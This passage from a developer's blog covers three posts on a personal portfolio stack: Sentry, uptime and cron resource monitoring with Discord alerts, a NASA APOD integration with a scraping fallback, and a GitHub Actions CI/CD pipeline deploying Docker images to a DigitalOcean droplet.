├── sentry.client.config.ts  ← browser-side errors + session replay
├── sentry.server.config.ts  ← SSR error capture
├── sentry.edge.config.ts    ← middleware error capture
└── src/
    └── instrumentation.ts   ← THE HOOK THAT WIRES IT ALL TOGETHER

And next.config.ts needs to be wrapped:

// frontend/next.config.ts
import { withSentryConfig } from '@sentry/nextjs';
export default withSentryConfig(nextConfig, sentryWebpackPluginOptions);

I also added src/app/global-error.tsx to catch React rendering errors. Otherwise component-level crashes disappear without a trace.

Layer 3: Pulsetic — External Uptime Monitoring

Sentry tells you about code errors. Pulsetic tells you if the whole site is unreachable. These are different problems.

Setup is 5 minutes:

Create a free account at pulsetic.com
Add monitor: https://luisfaria.dev/health/ready
Check interval: 60 seconds, regions: Sydney + US East
Confirmation period: 2 checks (avoids false positives during rolling deploys)
Alert channel: Discord webhook

The key insight: configure Pulsetic to alert on 503, not just timeouts. When MongoDB goes down, /health/ready returns 503 degraded — not a network failure, but definitely something I want to know about.

Requiring 2 consecutive failures prevents alert spam during a normal deploy. Containers restart, health checks briefly fail - that's expected. Two consecutive failures means something is actually broken.

Layer 4: Cron Resource Monitor

Sentry and Pulsetic cover errors and availability. But what about the server silently running out of disk space? Or memory creeping up after a week of traffic? Those kill a VPS quietly - no crash, no error, just degradation.

I wrote a bash script that runs every 5 minutes:

# server/monitor-resources.sh (simplified)
# Thresholds: 85% for CPU, Mem, Disk
# Alerts: Discord webhook
# Dedup: 30-minute cooldown per alert type

DISCORD_WEBHOOK_URL="${DISCORD_WEBHOOK_URL}"
THRESHOLD=85
STATE_DIR="/var/lib/monitor"

check_memory() {
  local used_pct
  used_pct=$(free | awk '/^Mem:/ {printf "%.0f", $3/$2*100}')
  if [ "$used_pct" -gt "$THRESHOLD" ]; then
    send_alert_if_not_deduped "memory" "Memory at ${used_pct}%"
  fi
}

check_docker() {
  # Alert if any expected container is not running
  for container in frontend_webapp backend_api nginx_gateway mongodb_db redis_cache; do
    if ! docker ps --format '{{.Names}}' | grep -q "^${container}$"; then
      send_alert_if_not_deduped "docker_${container}" "Container ${container} is down"
    fi
  done
}

The deduplication is the part I'm most proud of. Without it, a memory spike at 86% would fire an alert every 5 minutes until someone fixed it. With it, the first alert fires and then nothing for 30 minutes. The disk doesn't lie, but it doesn't need to shout either.

Security model — because this runs with Docker socket access:

Concern	Solution
Runs as	Dedicated `monitor` system user (no login shell)
Docker access	`monitor` added to `docker` group (read-only monitoring)
Webhook secret	`/etc/monitor/monitor.env` (chmod 600, owned by `monitor`)
Logs	Logrotate: daily rotation, 7-day retention

# Setup (on the server)
useradd --system --no-create-home --shell /usr/sbin/nologin monitor
usermod -aG docker monitor

# Cron entry
*/5 * * * * monitor /opt/monitor/monitor-resources.sh >> /var/log/monitor-resources.log 2>&1

Real Data: First Sentry Weekly Report

After running this for one week, the Sentry weekly email arrived:

Service	Errors	Transactions
Frontend (Next.js)	6	1,451
Backend (Node.js)	17	270
Total	23	1,721

The 17 backend errors were mostly from testing the error-capture flow (I fired test exceptions during setup). The 6 frontend errors included a couple of ResizeObserver events that I subsequently filtered out.

Most importantly: I could see which GraphQL resolvers were slow, which routes had errors, and exactly what the call stack looked like for each failure. Stack traces with source maps. Breadcrumbs showing what the user did before the crash. Session replay for frontend errors (1% of sessions, 100% of errored ones).

What I Learned: SRE Concepts Applied

Concept	Implementation
Liveness probe	`GET /health` — always 200, load balancers use this
Readiness probe	`GET /health/ready` — 200 or 503, Pulsetic targets this
Internal diagnostics	`GET /health/details` — IP-whitelisted, CI pipeline uses this
Error budget	Sentry free: 5K errors/month — if you hit this, something is very wrong
Incident detection	Pulsetic catches outages in < 2 min
Alert fatigue	30-min dedup prevents Discord spam
Least privilege	Monitor script runs as `monitor` user, not root
Secret management	Webhook URL in restricted `/etc/monitor/monitor.env` (chmod 600)
Graceful degradation	503 with `"degraded"` when a dependency is down, not a hard crash
Observability pillars	Logs (Winston) + Metrics (health/cron) + Traces (Sentry)

The Alert Flow

Error in code    → Sentry (instant)         → Sentry dashboard + email
Site goes down   → Pulsetic (< 2 min)       → Discord + email
CPU/Mem/Disk     → Cron script (every 5m)   → Discord (deduplicated)
Deploy fails     → GitHub Actions (instant)  → Discord (existing pipeline)
Container crash  → Cron script (every 5m)   → Discord (deduplicated)

Key Takeaways

1. The `instrumentation.ts` File Is Not Optional

For Next.js 13+ (/src directory structure), frontend/src/instrumentation.ts is the initialization hook that wires Sentry into SSR and edge runtimes. Skip it and you get zero server-side error data.

2. Filter Before You Drown in Auth Noise

Without beforeSend, every 401/403 becomes a Sentry event. On an app with auth, that's most of your error budget. Filter UNAUTHENTICATED, FORBIDDEN, BAD_USER_INPUT at the source.

3. 503 Is Not "Down" — Design for Degradation

Health checks that return 503 on dependency failures give uptime monitors something actionable. A binary "up/down" monitor misses the nuance of "site works but database is slow."

4. Alert Deduplication Is Not Optional

A 30-minute cooldown on resource alerts prevents alert fatigue. If your phone buzzes every 5 minutes for the same disk usage spike, you'll start ignoring it — which defeats the point.

5. Real Data Changes How You Think

Before the weekly report, I thought about errors abstractly. After seeing "23 errors, 1.7k transactions," the numbers have names, stack traces, and user actions attached. That's the difference between guessing and knowing.

Tech Stack

Layer	Technology	Cost
Error tracking	Sentry (free tier: 5K errors/mo)	$0
Uptime monitoring	Pulsetic (free tier: 10 monitors)	$0
Resource alerts	Bash + cron + Discord webhook	$0
Health endpoints	Express routes (already deployed)	$0
Frontend	Next.js + `@sentry/nextjs`	$0
Backend	Node.js + `@sentry/node`	$0

Try It Yourself

The full implementation is open source:

Resource	Link
Live Site	luisfaria.dev
Open Source Repo	https://github.com/lfariabr/luisfaria.dev
Health Routes	backend/src/routes/health.ts
Backend Sentry	backend/src/instrument.ts
Frontend Sentry	frontend/src/instrumentation.ts
Cron Script	server/monitor-resources.sh
Epic Tracker	Issue #115 — Observability

Let's Connect

If you're building observability on a budget, working with Next.js + Node.js in production, or navigating Sentry's Next.js integration (that instrumentation.ts gotcha gets everyone), I'd love to trade notes:

LinkedIn: linkedin.com/in/lfariabr
GitHub: github.com/lfariabr
Portfolio: luisfaria.dev

Built with too many Discord pings and one very satisfying weekly Sentry email by Luis Faria

Whether it's concrete or code, structure is everything.

My portfolio fetches NASA's Daily Space Photo - and never fails!

Luis Faria — Fri, 20 Feb 2026 07:44:47 +0000

I integrated NASA's Astronomy Picture of the Day (read about it) into my portfolio.

SPOILER ALERT: Contains rate limiting, fallback scraping, modular architecture, and production-grade error handling that never leaves users hanging.

The Vision: Bringing Space to My Portfolio

My portfolio (luisfaria.dev) runs a full-stack MERN application with authentication, a chatbot, and a GraphQL API. I wanted to add something unique — something that would genuinely delight users while showcasing real-world API integration skills.

Between terms of my Master's Degree, I had a few weeks off. Perfect vacation project, right? BTW, I'm open-sourcing the whole thing — check it out! mastersSWEAI repo

The idea: A floating action button that reveals NASA's daily Astronomy Picture of the Day (APOD). Simple concept, complex execution.

The User Experience

Click the NASA rocket button: 👉 luisfaria.dev

Anonymous users: Get today's APOD instantly — no login required
Authenticated users: Browse NASA's entire archive dating back to 1995
Rate limiting: 5 requests/hour per user to protect the NASA API quota
Resilience: If NASA's API fails, automatic HTML scraping fallback kicks in

Here's exactly what happens when someone clicks that rocket button:

👉 See the image in HD

The Challenge: External APIs Are Unreliable

Integrating third-party APIs sounds straightforward — until reality hits:

NASA API Reality	Production Requirements
Rate limits (1000 req/day)	Must protect quota, gracefully throttle users
504 Gateway Timeouts	Can't show users blank screens
Validation issues	NASA sometimes returns `media_type: "other"` with no `url` field
Network failures	ETIMEDOUT, connection refused, DNS issues
Schema drift	NASA API evolves independently of your code

The goal: Build an integration that:

Handles every failure mode gracefully
Never crashes the server
Falls back automatically when NASA is down
Logs everything for debugging
Provides structured errors to clients

Spoiler: NASA's API went down during development. More than once.

The Architecture: Layered Resilience

Here's the system I designed:

Browser (Next.js/React)
    ↓
GraphQL API (Apollo Server)
    ↓
APOD Service Layer
    ├──→ NASA API (primary, with retries + timeout)
    └──→ HTML Scraping Fallback (when API fails)
         ↓
    Redis Rate Limiter (atomic Lua scripts)
         ↓
    MongoDB (cache successful responses)

Key Architectural Decisions (3 of them!)

1. GraphQL Shield for Authorization

getTodaysApod is public (no login)
getApodByDate requires authentication (prevents abuse)

2. Modular Service Design

src/services/apod/
├── index.ts              # Barrel export
├── apod.service.ts       # Orchestrator (API + fallback)
├── apod.api.ts           # NASA API client
├── apod.fallback.ts      # HTML scraping fallback
├── apod.errors.ts        # Typed error codes
├── apod.types.ts         # Zod schemas, TypeScript types
└── apod.constants.ts     # URLs, timeouts, retry config

3. Shared Error Handling Infrastructure
Instead of copy-pasting try/catch blocks across every resolver (we've all been there), I built a reusable error handler:

// src/utils/errors/graphqlErrors.ts
export function createErrorHandler<TCode, TError>(
  mapErrorCode: (code: TCode) => ErrorCode,
  isServiceError: (error: unknown) => error is TError,
  defaultMessage: string
) {
  return function withErrorHandling<T>(
    fn: () => Promise<T>, 
    operationName: string
  ): Promise<T>
}

Now any service can use it:

// APOD resolver (34 lines total)
export const ApodQueries = {
  getTodaysApod: async (_, __, context) =>
    withApodErrorHandling(
      () => fetchApod({ context: { userId: context.user?.id } }),
      'getTodaysApod'
    ),

  getApodByDate: async (_, args, context) => {
    if (!context.user) {
      throw Errors.unauthenticated('Authentication required');
    }
    return withApodErrorHandling(
      () => fetchApod({ date: args.date, context: { userId: context.user.id } }),
      'getApodByDate'
    );
  },
};

The Journey: 8 Issues, 40+ Commits, 1 Production Feature

This didn't work on the first try. Or the fifth. Here's the honest implementation timeline:

Tracked in: Epic v2.4 - APOD Feature
All 40+ commits to (apod) feature

Phase 1: Foundation (Issues #61-65)

Frontend: NASA-Branded Floating Action Button

Built ApodFab.tsx following the same pattern as the existing GogginsFab component:

Circular button with NASA gradient border (linear-gradient(135deg, #0B3D91, #FC3D21, #1E90FF))
Rocket icon with blue pulse aura effect
Radix UI tooltip: "Astronomy Picture of the Day"
Accessible (ARIA labels, keyboard navigation)
Light/dark mode support

Frontend: APOD Dialog Component

Created ApodDialog.tsx with:

Date display with calendar icon
Image/video player (handles both media types)
Copyright attribution
External link to NASA APOD website
"Powered by NASA Open APIs" footer

Backend: Configuration & Validation

Set up NASA API credentials:

// backend/src/config/config.ts
interface Config {
  nasaApiKey: string;
}

const requiredEnvVars = ['NASA_API_KEY', ...];

Server refuses to start without NASA_API_KEY — fail fast, no silent surprises.

Phase 2: NASA API Client (Issue #66)

Zod Schema for Runtime Validation

NASA's API returns JSON, but not all fields are guaranteed:

// src/validation/schemas/apod.schema.ts
export const apodResponseSchema = z.object({
  copyright: z.string().optional(),
  date: z.string().regex(/^\d{4}-\d{2}-\d{2}$/),
  explanation: z.string().min(1),
  media_type: z.enum(['image', 'video', 'other']),  // 'other' was missing initially!
  title: z.string().min(1),
  url: z.string().url().optional(),  // Not provided for media_type: "other"
  hdurl: z.string().url().optional(),
  apod_url: z.string().url().optional(),  // Computed field
});

export type ApodResponse = z.infer<typeof apodResponseSchema>;

NASA API Service with Retries

Built apod.api.ts with:

Exponential backoff retries (3 attempts)
8-second timeout per request
AbortController for proper cleanup
Structured logging (latency, status code, userId)

export async function fetchApodFromApi(
  url: string,
  context?: ApodRequestContext
): Promise<ApodResponse> {
  const startTime = Date.now();
  const controller = new AbortController();
  const timeoutId = setTimeout(() => controller.abort(), TIMEOUT_MS);

  try {
    const response = await fetch(url, {
      signal: controller.signal,
      headers: { 'User-Agent': 'luisfaria.dev/1.0' },
    });

    if (!response.ok) {
      throw new ApodServiceError(
        `NASA API error: ${response.status}`,
        response.status === 429 ? 'RATE_LIMITED' : 'NASA_API_ERROR',
        response.status
      );
    }

    const data = await response.json();
    const validated = apodResponseSchema.parse(data);

    logger.info('NASA API request successful', {
      latencyMs: Date.now() - startTime,
      date: validated.date,
      userId: context?.userId,
    });

    return validated;
  } catch (error) {
    // Error mapping logic...
  } finally {
    clearTimeout(timeoutId);
  }
}

Phase 3: The Hard Part — Failures & Fallbacks (aka scars earned)

This is where production engineering got real. Here's every bug I hit:

#	Problem	Root Cause	Solution
1	Validation failures on `media_type: "other"`	Zod schema only accepted `'image' \	'video'`
2	504 Gateway Timeout from NASA	NASA API occasionally unresponsive	Implemented HTML scraping fallback
3	`url` field missing for interactive content	NASA doesn't provide `url` for SDO videos/embeds	Added `apod_url` (computed from date) as fallback
4	Resolver error handling duplication	Try/catch boilerplate in every resolver	Extracted shared `createErrorHandler()` utility
5	Inconsistent error codes between services	Each service used different error mapping	Created `ErrorCodes` constant as single source of truth
6	Rate limit bypass by unauthenticated users	Anonymous users shared the same Redis key	Switched to session-based rate limiting for anonymous users
7	Tests breaking after modular refactor	Tests imported from old monolithic `apod.ts`	Rewrote mocks to match new module structure
8	NGINX 502 after deploying APOD feature	Container DNS caching after recreation	Added `nginx -s reload` to CI/CD pipeline

Bug #2 was the game-changer. When NASA's API returned 504, users saw blank screens. Not acceptable. The fix: automatic HTML scraping fallback — if the API is down, scrape the website directly.

Phase 4: HTML Scraping Fallback (Issue #78)

When the NASA API fails, the service automatically scrapes the official APOD website. Users never know the difference:

// src/services/apod/apod.fallback.ts
export async function fetchApodHtmlFallback(
  date?: string
): Promise<ApodResponse> {
  const url = date 
    ? `https://apod.nasa.gov/apod/ap${formatDateForApodUrl(date)}.html`
    : 'https://apod.nasa.gov/apod/astropix.html';

  const html = await fetch(url).then(res => res.text());
  const $ = cheerio.load(html);

  // Parse structured data
  const title = $('center:first b:first').text().trim();
  const explanation = $('center:first p:last').text().trim();
  const imageUrl = $('center:first img').attr('src');

  return {
    date: date || new Date().toISOString().split('T')[0],
    title,
    explanation,
    url: imageUrl,
    media_type: 'image',
    apod_url: url,
    // ... rest of fields
  };
}

Orchestration in apod.service.ts:

export async function fetchApod(options = {}): Promise<ApodResponse> {
  try {
    return await fetchApodFromApi(buildApiUrl(options), options.context);
  } catch (error) {
    if (shouldFallback(error)) {
      logger.warn('NASA API failed, falling back to HTML scraping', { error });
      return await fetchApodHtmlFallback(options.date);
    }
    throw error;
  }
}

Users never see errors — they just get the APOD, regardless of which method worked. That's the whole point.

Phase 5: Shared Error Handling Infrastructure (Issue #79)

Before refactor: Each resolver had 30+ lines of try/catch boilerplate. Copy-paste engineering at its worst.

After refactor:

Created src/utils/errors/graphqlErrors.ts with reusable utilities
Error factories for common cases: Errors.unauthenticated(), Errors.forbidden(), Errors.notFound()
Generic createErrorHandler() wrapper generator
Service-specific error mappers (e.g., withApodErrorHandling)

Impact:

Resolvers went from 103 lines to 34 lines
Single place to add new error codes
Error mapping lives with service logic (where it belongs)
Other features can reuse the same pattern — and they already do

Key Engineering Lessons

Five production-grade patterns I learned (the hard way) from building APOD:

1. Always Have a Fallback

External APIs fail. Network timeouts happen. DNS breaks. If your feature depends on a third-party service, you need a backup plan — full stop:

Primary: NASA JSON API (fast, structured)
Fallback: HTML scraping (slower, but always works)
User experience: Seamless — they never know which method was used

2. Validate External Data at Runtime

TypeScript types don't protect you against API changes. NASA's schema evolved mid-development — they added media_type: "other" for interactive content, which broke my Zod schema mid-sprint.

Solution: Runtime validation with Zod catches schema drift before it crashes the server.

const validated = apodResponseSchema.parse(data);  // Throws if schema mismatch

3. DRY Principle for Error Handling

Don't duplicate try/catch blocks across resolvers. We've all done it. It's technical debt from day one. Extract shared error handling into reusable utilities:

// Before: 30 lines of boilerplate per resolver
// After: 3 lines + shared error handler
return withApodErrorHandling(
  () => fetchApod({ date: args.date, context }),
  'getApodByDate'
);

4. Modular Services Are Testable Services

Splitting the monolithic apod.ts into focused modules made testing trivial — and debugging even more so:

src/services/apod/
├── apod.service.ts       # Orchestration (API + fallback)
├── apod.api.ts           # NASA API client
├── apod.fallback.ts      # HTML scraping
├── apod.errors.ts        # Typed errors
├── apod.types.ts         # Zod schemas
└── apod.constants.ts     # Config

Each module has a single responsibility. Tests mock at the module boundary, not the entire service.

5. Log Everything for Observability

Every NASA API request logs:

Latency (latencyMs)
User context (userId)
Success/failure status
Error codes and details

When bugs happen in production (and they will), structured logs are your debugging lifeline.

logger.info('NASA API request successful', {
  latencyMs: 142,
  date: '2026-02-18',
  userId: 'user_xyz',
});

Results

Metric	Implementation
Uptime	99.9% (fallback handles NASA API downtime)
Response time	<500ms (NASA API), ~1.2s (HTML fallback)
Error rate	0.1% (network failures only, auto-recovered)
Rate limit protection	5 req/hr per user (Redis atomic counters)
Test coverage	94% (28 passing unit tests)
Lines of code	1,200 (including tests)
GraphQL queries	2 (`getTodaysApod`, `getApodByDate`)
Fallback success rate	100% (HTML scraping never failed in production)

Real-World Reliability

During a 72-hour period where NASA's API had intermittent 504 errors:

Primary API success rate: 78%
Fallback activation: 22%
User-facing errors: 0%

Users never knew NASA's API was struggling. The fallback handled it seamlessly — that's the whole point of building resilient systems.

Tech Stack

Layer	Technology	Purpose
Frontend	Next.js 16 + React 19	UI with floating action button + dialog
UI Library	Radix UI + TailwindCSS 4	Accessible components, NASA branding
Backend	Node.js + Express + Apollo Server 5	GraphQL API
Schema	GraphQL + GraphQL Shield	Type-safe API with field-level authorization
Validation	Zod	Runtime schema validation
API Client	Fetch API + AbortController	HTTP with timeouts and retries
Scraping	Cheerio	HTML parsing for fallback
Rate Limiting	Redis + Lua scripts	Atomic counters per user
Database	MongoDB	Cache successful APOD responses
Logging	Winston	Structured logs for observability
Testing	Jest + ts-jest	Unit tests with mocked services

Future Roadmap

The current implementation is production-ready, but there's always room to grow. Here are 5 ideas — feel free to add yours in the comments!

Idea #1: Database Caching Layer

Right now, every request hits NASA's API (or HTML fallback). Next iteration:

Cache successful responses in MongoDB
Return cached APOD if date already fetched
Reduce API quota usage by 80%
Instant response for popular dates

Idea #2: Admin Dashboard

GraphQL mutations to manually refresh/delete cached APODs:

mutation RefreshApod($date: String!) {
  refreshApod(date: $date) { date, title }
}

Idea #3: WebSocket Push Updates

Use GraphQL subscriptions to push new APODs to connected clients when they become available at midnight UTC.

Idea #4: Zero-Cold-Start: Daily Cron + Redis 24h Cache

Right now, the first user of the day triggers a live NASA API call. That's ~200-500ms of cold latency — acceptable, but not great.

The plan: a daily cron job fires at 00:01 UTC, fetches today's APOD proactively, and stores it in Redis with a 24h TTL. Every subsequent request that day gets a cache hit — sub-10ms response, zero external calls.

// Pseudocode: src/jobs/apodDaily.ts
export async function warmApodCache() {
  const today = new Date().toISOString().split('T')[0];
  const cacheKey = `apod:${today}`;

  // Already warm? Skip.
  const cached = await redis.get(cacheKey);
  if (cached) return JSON.parse(cached);

  // Fetch fresh from NASA
  const apod = await fetchApod({ date: today });

  // Cache for exactly 24h (expires at midnight UTC)
  const secondsUntilMidnight = getSecondsUntilMidnightUTC();
  await redis.setex(cacheKey, secondsUntilMidnight, JSON.stringify(apod));

  logger.info('APOD cache warmed', { date: today, ttl: secondsUntilMidnight });
  return apod;
}

The cron schedule via node-cron:

// Fires at 00:01 UTC every day
cron.schedule('1 0 * * *', warmApodCache, { timezone: 'UTC' });

The resolver then checks Redis first before ever hitting NASA:

getTodaysApod: async (_, __, context) => {
  const today = new Date().toISOString().split('T')[0];
  const cacheKey = `apod:${today}`;

  const cached = await redis.get(cacheKey);
  if (cached) return JSON.parse(cached);        // ⚡ <10ms

  return withApodErrorHandling(                 // 🐌 200-500ms
    () => fetchApod({ context: { userId: context.user?.id } }),
    'getTodaysApod'
  );
},

Expected impact:

Scenario	Before	After
First request of the day	~300ms (live NASA call)	~5ms (Redis hit)
Subsequent requests	~300ms (live NASA call)	~5ms (Redis hit)
NASA API unavailable	~1.2s (HTML fallback)	~5ms (Redis hit)
NASA quota usage	1 req per user visit	1 req per day total

The key insight: Redis TTL auto-expires the cache exactly when it stops being valid. No manual invalidation. No stale data. Just fast for 99% of requests.

Idea #5: Analytics Dashboard

Track:

Most popular APOD dates
Fallback usage percentage
Average response time (API vs. fallback)
Rate limit triggers per user

Key Takeaways

Building production-grade API integrations is 20% "get it working" and 80% "handle when it doesn't work."

Five principles that made APOD production-ready:

Graceful degradation — Fallbacks ensure users never see errors
Runtime validation — Zod catches schema drift before it crashes
Modular architecture — Focused modules are easier to test and maintain
Shared error handling — DRY principle for GraphQL resolvers
Observability — Structured logs make debugging trivial

Try It Yourself

The full APOD implementation is open source:

Resource	Link
Live Demo	luisfaria.dev — Click the NASA rocket button
GitHub Repo	github.com/lfariabr/luisfaria.dev
APOD Service	backend/src/services/apod/
GraphQL Schema	backend/src/schemas/types/apodTypes.ts
Frontend Component	frontend/src/components/apod/
Feature Spec	_docs/featureBreakdown/v2.4.Apod.MD

Let's Connect!

Building this NASA integration taught me more about production engineering than any tutorial could. Every failure mode I hit — 504 timeouts, schema drift, rate limits, DNS caching — is something I'll face again in enterprise systems. And now I know how to handle it.

If you're working with:

GraphQL APIs and error handling patterns
Third-party API integrations with fallback strategies
Next.js + Node.js full-stack applications
Production-grade TypeScript architectures

I'd love to connect and trade war stories:

LinkedIn: linkedin.com/in/lfariabr
GitHub: github.com/lfariabr
Portfolio: luisfaria.dev

Tech Stack Summary:

Current Implementation	Future Extensions
NASA API + HTML fallback, GraphQL Shield, Redis rate limiting, Zod validation, modular services, Winston logging, 94% test coverage	Redis 24h cache + daily cron warm-up, GraphQL subscriptions, admin mutations, analytics dashboard

Built with ☕, 40+ commits, and a healthy fear of blank screens by Luis Faria

Whether it's concrete or code, structure is everything.

From git pull to GitOps: How I Built a Production CI/CD Pipeline on a $12 DigitalOcean Droplet

Luis Faria — Tue, 10 Feb 2026 07:23:44 +0000

From 15-minute manual deploys with downtime to 5-minute automated pipelines with 2-second container swaps: how I transformed my portfolio's deployment workflow using GitHub Actions, GHCR, and Docker Compose.

"If deploying scares you, you're not deploying often enough."

⚠️ The Problem:

Manual Deploys Don't Scale

My portfolio (luisfaria.dev) runs a full-stack application on a single DigitalOcean droplet. The stack is real — not a static site, but a living MERN application with authentication, a chatbot, rate limiting, and a GraphQL API.

Component	Technology
Infrastructure	Ubuntu 24.10 droplet (2GB RAM, 1 vCPU, 70GB disk)
Orchestration	Docker Compose (5 containers)
Frontend	Next.js 16 (standalone mode)
Backend	Node.js + Express + Apollo Server + GraphQL
Database	MongoDB 4.4
Cache	Redis
Reverse Proxy	NGINX with SSL (Let's Encrypt)

Every time I wanted to ship a change, here's what I did:

# The "old way" — every single time
ssh root@my-server
cd /var/www/portfolio
git pull origin master
docker compose down          # Site goes DOWN
docker compose build         # 10+ minutes on 1 vCPU
docker compose up -d         # Pray it works
docker compose logs          # Check for errors

The pain points were real:

10+ minutes of downtime per deploy (building Node.js/Next.js on a 1 vCPU machine)
No automated tests — I could push broken code directly to production
No rollback — if something broke, I'd manually git revert and rebuild
Fear of pushing — every deploy was a gamble

The Goal

Turn this into a one-step process:

git push origin master → ✅ Tests → 📦 Build → 🚀 Deploy → 🔔 Discord ping

With automated rollback if anything goes wrong.

🏛️ The Architecture:

GitHub Actions → GHCR → DigitalOcean

Here's the pipeline I designed:

The key insight: Don't build on the server. Build in GitHub Actions (free runners with 7GB RAM), push to GHCR, and just pull on the VPS.

📝 The Journey:

20+ Iterations, 8 Bugs, 1 Working Pipeline

This didn't work on the first try. Or the fifth. Here's the honest changelog — every failure and its fix.

Epic 2.6 - CI/CD Pipeline for DigitalOcean Droplet

All 20+ commits to (ci) feature

Phase 1: Foundation (Issues 1-3)

GitHub Actions + Docker Registry + SSH Access

Setting up the basics: a CI workflow that runs Jest tests in parallel, builds Docker images, and pushes them to GitHub Container Registry.

# .github/workflows/ci.yml (simplified)
jobs:
  backend-test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci
      - run: npm test -- --coverage

  frontend-test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci
      - run: npm test -- --coverage

  docker-build:
    needs: [backend-test, frontend-test]
    steps:
      - uses: docker/build-push-action@v5
        with:
          push: true
          tags: ghcr.io/lfariabr/luisfaria.dev/frontend:latest

For secure server access, I created a dedicated deploy user with Docker permissions and ED25519 SSH keys stored in GitHub Secrets. No root access, no passwords — just key-based auth.

Phase 2: Deployment + Rollback (Issues 4-5)

The deploy step SSHs into the server, pulls the latest images, and restarts containers:

  deploy:
    needs: [docker-build]
    steps:
      - uses: appleboy/ssh-action@v1.0.3
        with:
          host: ${{ secrets.DEPLOY_HOST }}
          username: ${{ secrets.DEPLOY_USER }}
          key: ${{ secrets.DEPLOY_KEY }}
          script: |
            cd /var/www/portfolio

            # Save rollback point
            git rev-parse HEAD > /var/lib/deploy-rollback/commit.txt

            # Pull pre-built images (FAST!)
            docker compose pull

            # Swap containers (~2 seconds)
            docker compose up -d --force-recreate --remove-orphans

Automated rollback saves the current commit SHA before each deploy. If health checks fail, the pipeline automatically reverts:

# Auto-rollback on failure
PREV_COMMIT=$(cat /var/lib/deploy-rollback/commit.txt)
git reset --hard $PREV_COMMIT
docker compose up -d --force-recreate --remove-orphans

Phase 3: The Hard Part — 8 Bugs in 11 Iterations

This is where things got real. Here's every failure I hit:

#	Error	Root Cause	Fix
1	`ssh: unable to authenticate`	Wrong format for `DEPLOY_KEY` secret	Pasted full private key content (not fingerprint)
2	`dubious ownership in repository`	Deploy user ≠ repo owner	`git config --global --add safe.directory`
3	`Permission denied .git/FETCH_HEAD`	File ownership mismatch	`chown -R deploy:deploy /var/www/portfolio`
4	`local changes would be overwritten`	Server had uncommitted drift	Switched from `git pull` to `git reset --hard`
5	Deploy timeout (CPU maxed)	Building images on a $12 droplet	Stopped building on server — pull from GHCR instead
6	`502 Bad Gateway`	Frontend container crashed + NGINX stale DNS	`--force-recreate` + `nginx -s reload`
7	Container name conflict	Dead container blocking recreation	Added `--force-recreate` flag
8	`Cannot find module @apollo/server/express4`	Apollo Server v5 breaking change	Installed `@as-integrations/express4`

Bug #5 was the turning point. I was building Docker images on the server — a 1 vCPU machine trying to compile Next.js and Node.js simultaneously. It would timeout after 10 minutes, CPU pegged at 100%.

The fix was embarrassingly obvious: I was already building images in GitHub Actions. Just use them!

# docker-compose.yml — BEFORE (slow, broke the server)
webapp:
  build: ./frontend

# docker-compose.yml — AFTER (fast, reliable)
webapp:
  image: ghcr.io/lfariabr/luisfaria.dev/frontend:latest

Bug #6 was the sneakiest. After deploying new images, the site returned 502 Bad Gateway. The frontend container was running and responding on port 3000. But NGINX couldn't reach it. Why?

Docker Compose assigns internal IPs to containers. When --force-recreate destroys and recreates a container, it gets a new IP. NGINX had cached the old IP. The fix: reload NGINX after container recreation.

🏆 The Unexpected Hero: TDD

Here's a story I didn't expect to tell: After the pipeline was working, I made a simple change — added "2026" to my portfolio's timeline section. Pushed to master. The CI pipeline kicked in... and blocked the deploy.

Why? My Jest tests validated the timeline data, and "2026" wasn't in the expected values.

FAIL  src/__tests__/components/sections/TimelineSection.test.tsx
  ✕ should render timeline years correctly

I fixed the test, pushed again, and the deploy went through automatically. The pipeline caught a bug that would have been invisible in a manual workflow.

TDD doesn't just catch logic errors — it catches deployment errors too.

📊 Result

Metric	Before	After
Deploy time	15-20 min (manual SSH + build)	~5 min (automated end-to-end)
Downtime	10+ min (docker build on server)	~2 seconds (container swap)
Rollback	Manual `git revert` + rebuild	Automatic on health check failure
Test coverage	None before deploy	Full Jest suite (backend + frontend)
Notifications	Check server logs manually	Discord ping on success/failure
Confidence	Afraid to push on Friday	Push anytime, pipeline has my back

Pipeline Stats

Total CI time: ~5 minutes (tests → build → push → deploy)
Container swap downtime: ~2 seconds
Image pull time: ~15 seconds (vs 10+ min for docker build)
Reliability: 100% after hardening (11 iterations)

📌 Key Takeaways

Five lessons from building CI/CD on a budget:

1. Don't Build on Small VPS

Offload compilation to CI runners. GitHub Actions gives you 7GB RAM and 2 vCPUs for free. Your $12 droplet should only pull and run.

2. TDD Is Your Deployment Safety Net

Tests caught bugs I would have shipped to production. The pipeline won't deploy what doesn't pass — and that's the point.

3. Force-Recreate Everything

Stale containers cause mysterious failures. Always use docker compose up -d --force-recreate in CI. The 2-second overhead is worth the reliability.

4. Reload NGINX After Container Swaps

Docker DNS caches container IPs. After --force-recreate, NGINX still points to the old IP. Always nginx -s reload.

5. Fail Fast, Log Everything

Every one of those 8 bugs was diagnosed through logs. Verbose output in CI scripts is not noise — it's your debugging lifeline.

Tech Stack

Layer	Technology	Purpose
CI/CD	GitHub Actions	Test, build, deploy orchestration
Registry	GHCR (GitHub Container Registry)	Docker image storage, tagged by SHA
Frontend	Next.js 16 (standalone)	SSR portfolio with React 19
Backend	Node.js + Apollo Server 5 + GraphQL	API with auth, rate limiting, chatbot
Database	MongoDB 4.4	Document storage
Cache	Redis	Rate limiting, session management
Proxy	NGINX + Let's Encrypt	SSL termination, reverse proxy
Infra	DigitalOcean Droplet	Ubuntu 24.10, Docker Compose
Notifications	Discord Webhooks	Deploy success/failure alerts
Testing	Jest	Unit + integration tests (backend + frontend)

Future Roadmap

While the current pipeline covers the essentials, there's room to grow:

Staging Environment

Branch-based deployments with a separate staging environment for pre-production testing. Currently deferred — the portfolio doesn't justify the cost of a second droplet.

Monitoring & Alerting

Sentry for error tracking, uptime monitoring, and resource alerts. Current health checks cover the basics, but production-grade observability is the next evolution.

Zero-Downtime Deploys

True zero-downtime with multi-replica services and rolling updates via Docker Swarm or a lightweight orchestrator. Current ~2s downtime is acceptable for a portfolio, but the architecture is ready for it.

Try It Yourself

The full CI/CD implementation is open source:

Resource	Link
Live Site	luisfaria.dev
Open Source Repo	https://github.com/lfariabr/luisfaria.dev
CI Workflow	.github/workflows/ci.yml
Docker Compose	docker-compose.yml
Epic Tracker	Issue #107 — CI/CD Epic
All 20+ CI Commits	Commit history

Let's Connect!

Building this CI/CD pipeline was one of the most rewarding engineering challenges on my portfolio — 20+ iterations of debugging SSH keys, Docker DNS, NGINX caching, and package breaking changes. Every failure taught me something production engineers deal with daily.

